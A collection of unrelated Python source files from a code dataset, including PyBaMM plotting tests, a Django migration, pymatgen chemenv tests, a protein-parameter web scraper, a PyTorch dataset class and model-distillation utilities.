geometry = spm.default_geometry
param = spm.default_parameter_values
param.process_model(spm)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 5, var.x_s: 5, var.x_p: 5, var.r_n: 5, var.r_p: 5, var.z: 5}
mesh = pybamm.Mesh(geometry, spm.default_submesh_types, var_pts)
disc_spm = pybamm.Discretisation(mesh, spm.default_spatial_methods)
disc_spm.process_model(spm)
t_eval = np.linspace(0, 100, 10)
solution = spm.default_solver.solve(spm, t_eval)
# check 2D (x,z space) variables update properly for different time units
# Note: these should be the transpose of the entries in the processed variable
c_e = solution["Electrolyte concentration [mol.m-3]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Electrolyte concentration [mol.m-3]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][1]
np.testing.assert_array_almost_equal(qp_data.T, c_e[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[("Electrolyte concentration [mol.m-3]",)][0][1]
np.testing.assert_array_almost_equal(qp_data.T, c_e[:, :, -1])
pybamm.close_plots()
def test_plot_2plus1D_spm(self):
spm = pybamm.lithium_ion.SPM(
{"current collector": "potential pair", "dimensionality": 2}
)
geometry = spm.default_geometry
param = spm.default_parameter_values
param.process_model(spm)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {
var.x_n: 5,
var.x_s: 5,
var.x_p: 5,
var.r_n: 5,
var.r_p: 5,
var.y: 5,
var.z: 5,
}
mesh = pybamm.Mesh(geometry, spm.default_submesh_types, var_pts)
disc_spm = pybamm.Discretisation(mesh, spm.default_spatial_methods)
disc_spm.process_model(spm)
t_eval = np.linspace(0, 100, 10)
solution = spm.default_solver.solve(spm, t_eval)
quick_plot = pybamm.QuickPlot(
solution,
[
"Negative current collector potential [V]",
"Positive current collector potential [V]",
"Terminal voltage [V]",
],
)
quick_plot.dynamic_plot(testing=True)
quick_plot.slider_update(1)
# check 2D (y,z space) variables update properly for different time units
phi_n = solution["Negative current collector potential [V]"].entries
for unit, scale in zip(["seconds", "minutes", "hours"], [1, 60, 3600]):
quick_plot = pybamm.QuickPlot(
solution, ["Negative current collector potential [V]"], time_unit=unit
)
quick_plot.plot(0)
qp_data = quick_plot.plots[("Negative current collector potential [V]",)][
0
][1]
np.testing.assert_array_almost_equal(qp_data, phi_n[:, :, 0])
quick_plot.slider_update(t_eval[-1] / scale)
qp_data = quick_plot.plots[("Negative current collector potential [V]",)][
0
][1]
np.testing.assert_array_almost_equal(qp_data, phi_n[:, :, -1])
with self.assertRaisesRegex(NotImplementedError, "Shape not recognized for"):
pybamm.QuickPlot(solution, ["Negative particle concentration [mol.m-3]"])
pybamm.close_plots()
def test_failure(self):
with self.assertRaisesRegex(TypeError, "solutions must be"):
pybamm.QuickPlot(1)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
StarcoderdataPython
|
3224757
|
<filename>gsoc/anand/pipeline_3/utility/vocab_extractor_from_model/embedding_extractor.py
from __future__ import print_function
import tensorflow as tf
import numpy as np
"""
- The following code when run with proper model location is capable of extracting the trained embeddings of a given model.
- The embeddings are present in the form: <word> <dimensions>
- The embedding decoder outputs sparql language embeddings
- The embedding encoder outputs english language embeddings
"""
def restore_session(self, session):
saver = tf.train.import_meta_graph('./translate.ckpt-32000.meta')
saver.restore(session, './translate.ckpt-32000')
def test_word2vec():
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.restore_session(session)
model.get_embedding("assistance")
accum = []
with tf.Session() as sess:
saver = tf.train.import_meta_graph('translate.ckpt-32000.meta')
print("***************")
print(saver.restore(sess, "translate.ckpt-32000"))
print(tf.all_variables())
lis = (sess.run(('embeddings/decoder/embedding_decoder:0')))
print(np.shape(lis))
decode = open('vocab.sparql','r').readlines()
embed = open('embed_vocab.sparql','w')
if(len(decode) == np.shape(lis)[0]):
for dec in range(len(decode)):
accum.append([decode[dec][:-1]]+list(lis[dec,:]))
temp = ' '.join(str(v) for v in accum[-1])
#print(temp)
embed.write(temp+'\n')
embed.close()
lis = (sess.run(('embeddings/encoder/embedding_encoder:0')))
print(np.shape(lis))
decode = open('vocab.en','r').readlines()
embed = open('embed_vocab.en','w')
if(len(decode) == np.shape(lis)[0]):
for dec in range(len(decode)):
accum.append([decode[dec][:-1]]+list(lis[dec,:]))
temp = ' '.join(str(v) for v in accum[-1])
#print(temp)
embed.write(temp+'\n')
embed.close()
|
StarcoderdataPython
|
3283130
|
<filename>noxfile.py<gh_stars>1-10
import nox
@nox.session
def lint(session):
session.install('pytest>=5.3.5', 'setuptools>=45.2',
'wheel>=0.34.2', 'flake8>=3.7.9',
'numpy==1.18.1', 'pandas==1.1.4')
session.install('.')
session.run('flake8', 'sklearn_pandas/', 'tests')
@nox.session
@nox.parametrize('numpy', ['1.18.1', '1.19.4', '1.20.1'])
@nox.parametrize('scipy', ['1.4.1', '1.5.4', '1.6.0'])
@nox.parametrize('pandas', ['1.1.4', '1.2.2'])
def tests(session, numpy, scipy, pandas):
session.install('pytest>=5.3.5',
'setuptools>=45.2',
'wheel>=0.34.2',
f'numpy=={numpy}',
f'scipy=={scipy}',
f'pandas=={pandas}'
)
session.install('.')
session.run('py.test', 'README.rst', 'tests')
|
StarcoderdataPython
|
1687084
|
import os
API_KEY = os.environ['DATA_GOV_API_KEY']
CURR_PATH = os.getcwd()
RAW_PATH = os.path.join(CURR_PATH, 'raw')
if not os.path.exists(RAW_PATH):
os.mkdir(RAW_PATH)
MIN_YEAR = 1985
MAX_YEAR = 2018
MAX_WORKERS = 2
# URLS
ORI_URL = f'https://api.usa.gov/crime/fbi/sapi/api/agencies?api_key={API_KEY}'
# Column Order of ucr_ori_crosswalk.xlsx
ORI_XWALK_COLUMNS = [
'state_abbr', 'state_name', 'ori',
'agency_name', 'agency_type_name',
'county_name', 'region_desc', 'region_name',
'division_name', 'latitude', 'longitude',
'nibrs', 'nibrs_start_date'
]
|
StarcoderdataPython
|
4813572
|
<gh_stars>0
from pytorchisland import *
|
StarcoderdataPython
|
129146
|
<gh_stars>0
from unittest import TestCase
from afrigis.url_creator import create_full_url
class TestUrlCreator(TestCase):
def setUp(self):
pass
def test_url_creator_returns_correct_url(self):
# Pre-generated url for testing purposes
correct_url = 'http://example.rest/api/service.stub/key.stub/Y4COBwOqmksoSS22XMjDyUb1x4Q'
url = create_full_url(
afrigis_key='key.stub',
afrigis_secret='secret.stub',
afrigis_base_uri='http://example.rest/api/',
service_name='service.stub',
query_parameters={
'ils_parameter.stub': 'ils_parameter_value.stub'
}
)
self.assertEqual(url, correct_url)
def test_url_creator_returns_correct_url_without_params(self):
# Pre-generated url for testing purposes
correct_url = 'http://example.rest/api/service.stub/key.stub/CFCWk-x7utrDDUjbDnd0m_Haw1Y'
url = create_full_url(
afrigis_key='key.stub',
afrigis_secret='secret.stub',
afrigis_base_uri='http://example.rest/api/',
service_name='service.stub'
)
self.assertEqual(url, correct_url)
|
StarcoderdataPython
|
3359577
|
<filename>windyquery/tests/test_delete.py<gh_stars>10-100
import asyncio
from windyquery import DB
loop = asyncio.get_event_loop()
def test_delete(db: DB):
rows = loop.run_until_complete(db.table('users').insert(
{'email': '<EMAIL>', 'password': '<PASSWORD>'}).returning())
assert rows[0]['email'] == '<EMAIL>'
loop.run_until_complete(
db.table('users').where('id', rows[0]['id']).delete())
rows = loop.run_until_complete(
db.table('users').select().where('id', rows[0]['id']))
assert len(rows) == 0
|
StarcoderdataPython
|
176999
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.gis.db.models.fields
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Biome',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('biome', models.CharField(max_length=50, choices=[('BARE', 'Bare'), ('BEACH', 'Beach'), ('GRASSLAND', 'Grassland'), ('ICE', 'Ice'), ('LAKE', 'Lake'), ('MARSH', 'Marsh'), ('OCEAN', 'OCEAN'), ('SCORCHED', 'Scorched'), ('SHRUBLAND', 'Shrubland'), ('SNOW', 'Snow'), ('SUBTROPICAL_DESERT', 'Subtropical deset'), ('TAIGA', 'Taiga'), ('TEMPERATE_DECIDUOUS_FOREST', 'Deciduous foreset'), ('TEMPERATE_DESERT', 'Desert'), ('TEMPERATE_RAIN_FOREST', 'Rain forest'), ('TROPICAL_RAIN_FOREST', 'Tropical rain forest'), ('TROPICAL_SEASONAL_FOREST', 'Tropical seasonal forest'), ('TUNDRA', 'Tundra')])),
('border', models.BooleanField()),
('coast', models.BooleanField()),
('ocean', models.BooleanField()),
('water', models.BooleanField()),
('elevation', models.FloatField()),
('moisture', models.FloatField()),
('river', models.BooleanField()),
('center', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
('neighbors', models.ManyToManyField(to='main.Biome', related_name='neighbors_rel_+')),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('capital', models.BooleanField(default=False)),
('name', models.CharField(max_length=100)),
('coords', django.contrib.gis.db.models.fields.PointField(srid=4326)),
('biome', models.ForeignKey(to='main.Biome')),
],
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
('name', models.CharField(max_length=100)),
('neighbors', models.ManyToManyField(to='main.Region', related_name='neighbors_rel_+')),
],
),
migrations.CreateModel(
name='River',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('width', models.PositiveIntegerField()),
('geom', django.contrib.gis.db.models.fields.MultiLineStringField(srid=4326)),
],
),
migrations.AddField(
model_name='city',
name='region',
field=models.ForeignKey(to='main.Region'),
),
migrations.AddField(
model_name='biome',
name='region',
field=models.ForeignKey(to='main.Region', blank=True, null=True),
),
migrations.AlterUniqueTogether(
name='city',
unique_together=set([('region', 'capital')]),
),
]
|
StarcoderdataPython
|
4827916
|
<gh_stars>10-100
import copy
import pathlib
import sys
from typing import Any
from typing import Optional
import attr
from sqlalchemy.engine import Engine
import toml
from .types.namespace import namespace
from .utils.cast import CastError
from .utils.cast import cast
DEFAULT = {
'DEBUG': False,
'RECEIVE_TIMEOUT': 300, # 60 * 5 seconds
'REGISTER_CRONTAB': True,
'PREFIX': '',
'APPS': (),
'DATABASE_URL': '',
'DATABASE_ECHO': False,
'LOGGING': {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'brief': {'format': '%(message)s'},
'default': {
'format': '%(asctime)s %(levelname)s %(name)s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'brief',
'level': 'INFO',
'filters': [],
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'default',
'level': 'WARNING',
'filename': 'log/warning.log',
'maxBytes': 1024,
'backupCount': 3,
},
},
'loggers': {
'yui': {
'handlers': ['console', 'file'],
'propagate': True,
'level': 'INFO',
},
},
},
'CACHE': {'HOST': 'localhost', 'PORT': 11211, 'PREFIX': 'YUI_'},
}
class ConfigurationError(Exception):
pass
@namespace
class Config:
TOKEN: str
RECEIVE_TIMEOUT: int
DEBUG: bool
PREFIX: str
APPS: list[str]
DATABASE_URL: str
DATABASE_ECHO: bool
LOGGING: dict[str, Any]
REGISTER_CRONTAB: bool
CHANNELS: dict[str, Any]
USERS: dict[str, Any]
CACHE: dict[str, Any]
WEBSOCKETDEBUGGERURL: Optional[str] = None
DATABASE_ENGINE: Engine = attr.ib(init=False, repr=False, cmp=False)
def check(
self,
configs: dict[str, Any],
single_channels: set[str],
multiple_channels: set[str],
single_users: set[str],
multiple_users: set[str],
) -> bool:
for key, value in configs.items():
try:
config = getattr(self, key)
except AttributeError:
raise ConfigurationError(
f'Required config key was not defined: {key}'
)
try:
casted = cast(value, config)
if config != casted:
raise CastError
except CastError:
raise ConfigurationError(f'Wrong config value type: {key}')
for key in single_channels:
try:
value = self.CHANNELS[key]
except KeyError:
raise ConfigurationError(
f'Required channel key was not defined: {key}'
)
else:
if not isinstance(value, str):
raise ConfigurationError(
f'Channel config has wrong type: {key}'
)
for key in multiple_channels:
try:
value = self.CHANNELS[key]
except KeyError:
raise ConfigurationError(
f'Required channel key was not defined: {key}'
)
else:
if value == '*':
continue
elif isinstance(value, list):
if all(isinstance(x, str) for x in value):
continue
raise ConfigurationError(
f'Channel config has wrong type: {key}'
)
for key in single_users:
try:
value = self.USERS[key]
except KeyError:
raise ConfigurationError(
f'Required user key was not defined: {key}'
)
else:
if not isinstance(value, str):
raise ConfigurationError(
f'User config has wrong type: {key}'
)
for key in multiple_users:
try:
value = self.USERS[key]
except KeyError:
raise ConfigurationError(
f'Required user key was not defined: {key}'
)
else:
if value == '*':
continue
elif isinstance(value, list):
if all(isinstance(x, str) for x in value):
continue
raise ConfigurationError(f'User config has wrong type: {key}')
return True
def error(message: str, *args):
msg = message.format(*args)
print(msg, file=sys.stderr)
raise SystemExit(1)
def load(path: pathlib.Path) -> Config:
"""Load configuration from given path."""
if not path.exists():
error('File do not exists.')
if not path.is_file():
error('Given path is not file.')
if not path.match('*.config.toml'):
error('File suffix must be *.config.toml')
config_dict = copy.deepcopy(DEFAULT)
config_dict.update(toml.load(path.open()))
try:
config = Config(**config_dict)
except TypeError as e: # pragma: no cover
error(str(e))
raise
return config
|
StarcoderdataPython
|
3286122
|
<reponame>kjappelbaum/pymatgen
#!/usr/bin/env python
__author__ = "waroquiers"
import json
import os
import shutil
import unittest
import numpy as np
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import (
AngleNbSetWeight,
CNBiasNbSetWeight,
DeltaCSMNbSetWeight,
DistanceAngleAreaNbSetWeight,
MultiWeightsChemenvStrategy,
NormalizedAngleDistanceNbSetWeight,
SelfCSMNbSetWeight,
SimplestChemenvStrategy,
)
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import (
LocalGeometryFinder,
)
from pymatgen.analysis.chemenv.coordination_environments.structure_environments import (
LightStructureEnvironments,
StructureEnvironments,
)
from pymatgen.analysis.chemenv.coordination_environments.voronoi import (
DetailedVoronoiContainer,
)
from pymatgen.core.structure import Structure
json_files_dir = os.path.join(
os.path.dirname(__file__),
"..",
"..",
"..",
"..",
"..",
"test_files",
"chemenv",
"json_test_files",
)
se_files_dir = os.path.join(
os.path.dirname(__file__),
"..",
"..",
"..",
"..",
"..",
"test_files",
"chemenv",
"structure_environments_files",
)
class ReadWriteChemenvTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.lgf = LocalGeometryFinder()
cls.lgf.setup_parameters(centering_type="standard")
os.makedirs("tmp_dir")
def test_read_write_structure_environments(self):
f = open("{}/{}".format(json_files_dir, "test_T--4_FePO4_icsd_4266.json"), "r")
dd = json.load(f)
f.close()
atom_indices = dd["atom_indices"]
struct = Structure.from_dict(dd["structure"])
self.lgf.setup_structure(struct)
se = self.lgf.compute_structure_environments(
only_indices=atom_indices, maximum_distance_factor=2.25, get_from_hints=True
)
f = open("tmp_dir/se.json", "w")
json.dump(se.as_dict(), f)
f.close()
f = open("tmp_dir/se.json", "r")
dd = json.load(f)
f.close()
se2 = StructureEnvironments.from_dict(dd)
self.assertEqual(se, se2)
strategy = SimplestChemenvStrategy()
lse = LightStructureEnvironments.from_structure_environments(
structure_environments=se, strategy=strategy, valences="undefined"
)
f = open("tmp_dir/lse.json", "w")
json.dump(lse.as_dict(), f)
f.close()
f = open("tmp_dir/lse.json", "r")
dd = json.load(f)
f.close()
lse2 = LightStructureEnvironments.from_dict(dd)
self.assertEqual(lse, lse2)
def test_structure_environments_neighbors_sets(self):
f = open("{}/{}".format(se_files_dir, "se_mp-7000.json"), "r")
dd = json.load(f)
f.close()
se = StructureEnvironments.from_dict(dd)
isite = 6
nb_set = se.neighbors_sets[isite][4][0]
nb_set_surface_points = np.array(
[
[1.0017922780870239, 0.99301365328679292],
[1.0017922780870239, 0.0],
[2.2237615554448569, 0.0],
[2.2237615554448569, 0.0060837],
[2.25, 0.0060837],
[2.25, 0.99301365328679292],
]
)
self.assertTrue(
np.allclose(
np.array(nb_set.voronoi_grid_surface_points()), nb_set_surface_points
)
)
neighb_sites = nb_set.neighb_sites
coords = [
np.array([0.2443798, 1.80409653, -1.13218359]),
np.array([1.44020353, 1.11368738, 1.13218359]),
np.array([2.75513098, 2.54465207, -0.70467298]),
np.array([0.82616785, 3.65833945, 0.70467298]),
]
np.testing.assert_array_almost_equal(coords[0], neighb_sites[0].coords)
np.testing.assert_array_almost_equal(coords[1], neighb_sites[1].coords)
np.testing.assert_array_almost_equal(coords[2], neighb_sites[2].coords)
np.testing.assert_array_almost_equal(coords[3], neighb_sites[3].coords)
neighb_coords = nb_set.coords
np.testing.assert_array_almost_equal(coords, neighb_coords[1:])
np.testing.assert_array_almost_equal(
nb_set.structure[nb_set.isite].coords, neighb_coords[0]
)
normdist = nb_set.normalized_distances
self.assertAlmostEqual(
sorted(normdist),
sorted([1.0017922783963027, 1.0017922780870239, 1.000000000503177, 1.0]),
)
normang = nb_set.normalized_angles
self.assertAlmostEqual(
sorted(normang),
sorted([0.9999999998419052, 1.0, 0.9930136530585189, 0.9930136532867929]),
)
dist = nb_set.distances
self.assertAlmostEqual(
sorted(dist),
sorted(
[
1.6284399814843944,
1.6284399809816534,
1.6255265861208676,
1.6255265853029401,
]
),
)
ang = nb_set.angles
self.assertAlmostEqual(
sorted(ang),
sorted(
[
3.117389876236432,
3.117389876729275,
3.095610709498583,
3.0956107102102024,
]
),
)
nb_set_info = nb_set.info
self.assertAlmostEqual(nb_set_info["normalized_angles_mean"], 0.996506826547)
self.assertAlmostEqual(
nb_set_info["normalized_distances_std"], 0.000896138995037
)
self.assertAlmostEqual(nb_set_info["angles_std"], 0.0108895833142)
self.assertAlmostEqual(nb_set_info["distances_std"], 0.00145669776056)
self.assertAlmostEqual(nb_set_info["distances_mean"], 1.62698328347)
self.assertEqual(
nb_set.__str__(),
"Neighbors Set for site #6 :\n"
" - Coordination number : 4\n"
" - Voronoi indices : 1, 4, 5, 6\n",
)
self.assertFalse(nb_set.__ne__(nb_set))
self.assertEqual(nb_set.__hash__(), 4)
def test_strategies(self):
simplest_strategy_1 = SimplestChemenvStrategy()
simplest_strategy_2 = SimplestChemenvStrategy(
distance_cutoff=1.5, angle_cutoff=0.5
)
self.assertFalse(simplest_strategy_1 == simplest_strategy_2)
simplest_strategy_1_from_dict = SimplestChemenvStrategy.from_dict(
simplest_strategy_1.as_dict()
)
self.assertTrue(simplest_strategy_1, simplest_strategy_1_from_dict)
effective_csm_estimator = {
"function": "power2_inverse_decreasing",
"options": {"max_csm": 8.0},
}
self_csm_weight = SelfCSMNbSetWeight()
surface_definition = {
"type": "standard_elliptic",
"distance_bounds": {"lower": 1.1, "upper": 1.9},
"angle_bounds": {"lower": 0.1, "upper": 0.9},
}
surface_definition_2 = {
"type": "standard_elliptic",
"distance_bounds": {"lower": 1.1, "upper": 1.9},
"angle_bounds": {"lower": 0.1, "upper": 0.95},
}
da_area_weight = DistanceAngleAreaNbSetWeight(
weight_type="has_intersection",
surface_definition=surface_definition,
nb_sets_from_hints="fallback_to_source",
other_nb_sets="0_weight",
additional_condition=DistanceAngleAreaNbSetWeight.AC.ONLY_ACB,
)
da_area_weight_2 = DistanceAngleAreaNbSetWeight(
weight_type="has_intersection",
surface_definition=surface_definition_2,
nb_sets_from_hints="fallback_to_source",
other_nb_sets="0_weight",
additional_condition=DistanceAngleAreaNbSetWeight.AC.ONLY_ACB,
)
weight_estimator = {
"function": "smootherstep",
"options": {"delta_csm_min": 0.5, "delta_csm_max": 3.0},
}
symmetry_measure_type = "csm_wcs_ctwcc"
delta_weight = DeltaCSMNbSetWeight(
effective_csm_estimator=effective_csm_estimator,
weight_estimator=weight_estimator,
symmetry_measure_type=symmetry_measure_type,
)
bias_weight = CNBiasNbSetWeight.linearly_equidistant(
weight_cn1=1.0, weight_cn13=4.0
)
bias_weight_2 = CNBiasNbSetWeight.linearly_equidistant(
weight_cn1=1.0, weight_cn13=5.0
)
angle_weight = AngleNbSetWeight()
nad_weight = NormalizedAngleDistanceNbSetWeight(
average_type="geometric", aa=1, bb=1
)
multi_weights_strategy_1 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_2 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight_2,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_3 = MultiWeightsChemenvStrategy(
dist_ang_area_weight=da_area_weight_2,
self_csm_weight=self_csm_weight,
delta_csm_weight=delta_weight,
cn_bias_weight=bias_weight,
angle_weight=angle_weight,
normalized_angle_distance_weight=nad_weight,
symmetry_measure_type=symmetry_measure_type,
)
multi_weights_strategy_1_from_dict = MultiWeightsChemenvStrategy.from_dict(
multi_weights_strategy_1.as_dict()
)
self.assertTrue(multi_weights_strategy_1 == multi_weights_strategy_1_from_dict)
self.assertFalse(simplest_strategy_1 == multi_weights_strategy_1)
self.assertFalse(multi_weights_strategy_1 == multi_weights_strategy_2)
self.assertFalse(multi_weights_strategy_1 == multi_weights_strategy_3)
self.assertFalse(multi_weights_strategy_2 == multi_weights_strategy_3)
def test_read_write_voronoi(self):
f = open("{}/{}".format(json_files_dir, "test_T--4_FePO4_icsd_4266.json"), "r")
dd = json.load(f)
f.close()
struct = Structure.from_dict(dd["structure"])
valences = [site.specie.oxi_state for site in struct]
detailed_voronoi_container = DetailedVoronoiContainer(
structure=struct, valences=valences
)
f = open("tmp_dir/se.json", "w")
json.dump(detailed_voronoi_container.as_dict(), f)
f.close()
f = open("tmp_dir/se.json", "r")
dd = json.load(f)
f.close()
detailed_voronoi_container2 = DetailedVoronoiContainer.from_dict(dd)
self.assertEqual(detailed_voronoi_container, detailed_voronoi_container2)
@classmethod
def tearDownClass(cls):
# Remove the directory in which the temporary files have been created
shutil.rmtree("tmp_dir")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
67756
|
import logging
from simuvex.s_format import FormatParser
l = logging.getLogger("simuvex.procedures.snprintf")
######################################
# snprintf
######################################
class snprintf(FormatParser):
def run(self, dst_ptr, size): # pylint:disable=arguments-differ,unused-argument
#additional code
trace_data = ("snprintf", {"dst_ptr": (dst_ptr, dst_ptr.symbolic), "size": (size, size.symbolic)})
try:
self.state.procedure_data.global_variables["trace"].append(trace_data)
except KeyError:
self.state.procedure_data.global_variables["trace"] = []
self.state.procedure_data.global_variables["trace"].append(trace_data)
#end of additional code
# The format str is at index 2
fmt_str = self._parse(2)
out_str = fmt_str.replace(3, self.arg)
self.state.memory.store(dst_ptr, out_str)
# place the terminating null byte
self.state.memory.store(dst_ptr + (out_str.size() / 8), self.state.se.BVV(0, 8))
# size_t has size arch.bits
return self.state.se.BVV(out_str.size()/8, self.state.arch.bits)
|
StarcoderdataPython
|
120739
|
<filename>biomagicbox/expasy.py<gh_stars>0
import requests
import re,os,sqlite3
import threading
class ProtParam():
def __init__(self,dbname,tablename):
self.dbname=dbname
self.tablename=tablename
self.finish_num=0
self.url='https://web.expasy.org/cgi-bin/protparam/protparam'
self.headers={'Content-Type':'application/x-www-form-urlencoded'}
self.create_db()
def load_gene(self,filename):
with open(filename,encoding='utf-8') as f:
data=f.read().split('\n')
header=data[0].split(',')
exited_gene=self.view_db()
gene_ls=[]
for i in data[1:]:
if i!='':
temp=i.split(',')
if temp[0] not in exited_gene:
gene_ls.append((temp[0],temp[1]))
self.gene_ls=gene_ls
def create_db(self):
if not os.path.exists(self.dbname):
conn = sqlite3.connect(self.dbname)
conn.execute("CREATE TABLE "+self.tablename+"(GeneID TEXT,aa REAL, weight REAL, pI REAL, Instability REAL, Aliphatic REAL, GRAVY REAL, negatively REAL, positively REAL, Formula TEXT)")
conn.close()
def view_db(self):
conn = sqlite3.connect(self.dbname)
r=conn.execute("select GeneID from "+self.tablename)
ls=[i[0] for i in r.fetchall()]
return ls
def save_db(self,s):
conn=sqlite3.connect(self.dbname)
conn.execute("INSERT INTO "+self.tablename+" VALUES ("+s+")")
conn.commit()
conn.close()
def process_ls(self,geneid,ls):
return "'"+geneid+"',"+ls[2]+","+ls[3]+","+ls[4]+","+ls[5]+","+ls[0]+","+ls[1]+","+ls[6]+","+ls[7]+",'"+ls[8]+"'"
def get_expasy(self,geneid,seq,session):
seq=seq.replace('*','').replace(' ','').replace('\n','').replace('\t','').replace('\r','')
data={'sequence':seq}
while True:
try:
r=session.post(self.url,headers=self.headers,data=data)
break
except:
print('{} retry...'.format(geneid))
ls=self.get_params(r.text)
self.save_db(self.process_ls(geneid,ls))
def get_params(self,s):
pattern=re.compile('<B>Aliphatic index:</B> (.*)')
p1=pattern.findall(s)[0]
pattern=re.compile('<B>Grand average of hydropathicity \(GRAVY\):</B> (.*)')
p2=pattern.findall(s)[0]
pattern=re.compile('<B>Number of amino acids:</B> (.*)')
p3=pattern.findall(s)[0]
pattern=re.compile('<B>Molecular weight:</B> (.*)')
p4=pattern.findall(s)[0]
pattern=re.compile('<B>Theoretical pI:</B> (.*)')
p5=pattern.findall(s)[0]
pattern=re.compile(' is computed to be (.*)') # Instability index
p6=pattern.findall(s)[0]
pattern=re.compile('<B>Total number of negatively charged residues \(Asp \+ Glu\):</B> (.*)')
p7=pattern.findall(s)[0]
pattern=re.compile('<B>Total number of positively charged residues \(Arg \+ Lys\):</B> (.*)')
p8=pattern.findall(s)[0]
pattern=re.compile('<B>Formula:</B> (.*)')
p9=pattern.findall(s)[0].replace('<SUB>','').replace('</SUB>','')
return [p1,p2,p3,p4,p5,p6,p7,p8,p9]
def run_process(self,startpoint,endpoint):
session = requests.Session()
for i in self.gene_ls[startpoint:endpoint]:
self.get_expasy(i[0],i[1],session)
self.finish_num+=1
if self.finish_num==self.num_process:
print('Done!')
def run(self,num_process):
self.num_process=num_process
numtotal=len(self.gene_ls)
for i in range(self.num_process):
startpoint=i*int(numtotal/self.num_process)
if i==self.num_process-1:
endpoint=numtotal
else:
endpoint=(i+1)*int(numtotal/self.num_process)
threading.Thread(target=self.run_process,args=(startpoint,endpoint)).start()
def write_table(self,filename):
conn = sqlite3.connect(self.dbname)
r=conn.execute("select * from "+self.tablename)
s='Gene ID,Num of aa,Molecular weight,Theoretical pI,Instability index,Aliphatic index,GRAVY,Number of negatively charged residues,Number of positively charged residues,Formula\n'
for i in r.fetchall():
for j in i:
try:
s+=j+','
except:
s+=str(j)+','
s=s[:-1]+'\n'
with open(filename,'w+') as f:
f.write(s)
if __name__=='__main__':
c=ProtParam('test.db','expasy')
c.load_gene('test.csv')
c.run(17)
|
StarcoderdataPython
|
16389
|
<reponame>ngupta23/more
# For Time Logging
import time
from contextlib import contextmanager
import logging
@contextmanager
# Timing Function
def time_usage(name=""):
"""
log the time usage in a code block
"""
# print ("In time_usage runID = {}".format(runID))
start = time.time()
yield
end = time.time()
elapsed_seconds = float("%.10f" % (end - start))
logging.info('%s: Time Taken (seconds): %s', name, elapsed_seconds)
|
StarcoderdataPython
|
4804865
|
from torch.utils.data import Dataset
import torch
import os
class HANDataset(Dataset):
"""
A PyTorch Dataset class to be used in a PyTorch DataLoader to create batches.
"""
def __init__(self, data_folder, split):
"""
:param data_folder: folder where data files are stored
:param split: split, one of 'TRAIN' or 'TEST'
"""
split = split.upper()
assert split in {'TRAIN', 'TEST'}
self.split = split
# Load data
self.data = torch.load(os.path.join(data_folder, split + '_data.pth.tar'))
def __getitem__(self, i):
return torch.LongTensor(self.data['docs'][i]), \
torch.LongTensor([self.data['sentences_per_document'][i]]), \
torch.LongTensor(self.data['words_per_sentence'][i]), \
torch.LongTensor([self.data['labels'][i]])
def __len__(self):
return len(self.data['labels'])
|
StarcoderdataPython
|
3247878
|
<gh_stars>1-10
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Utilities to train a surrogate model from teacher."""
import numpy as np
from scipy.sparse import issparse, isspmatrix_csr, vstack as sparse_vstack
def _soft_logit(values, clip_val=5):
"""Compute a soft logit on an iterable by bounding outputs to a min/max value.
:param values: Iterable of numeric values to logit and clip.
:type values: iter
:param clip_val: Clipping threshold for logit output.
:type clip_val: Union[Int, Float]
"""
new_values = np.log(values / (1 - values))
return np.clip(new_values, -clip_val, clip_val)
def _model_distill(teacher_model_predict_fn, uninitialized_surrogate_model, data, original_training_data,
explainable_model_args):
"""Teach a surrogate model to mimic a teacher model.
:param teacher_model_predict_fn: Blackbox model's prediction function.
:type teacher_model_predict_fn: function
:param uninitialized_surrogate_model: Uninitialized model used to distill blackbox.
:type uninitialized_surrogate_model: uninitialized model
:param data: Representative data (or training data) to train distilled model.
:type data: numpy.ndarray
:param original_training_data: Representative data (or training data) to get predictions from teacher model.
:type original_training_data: numpy.ndarray
:param explainable_model_args: An optional map of arguments to pass to the explainable model
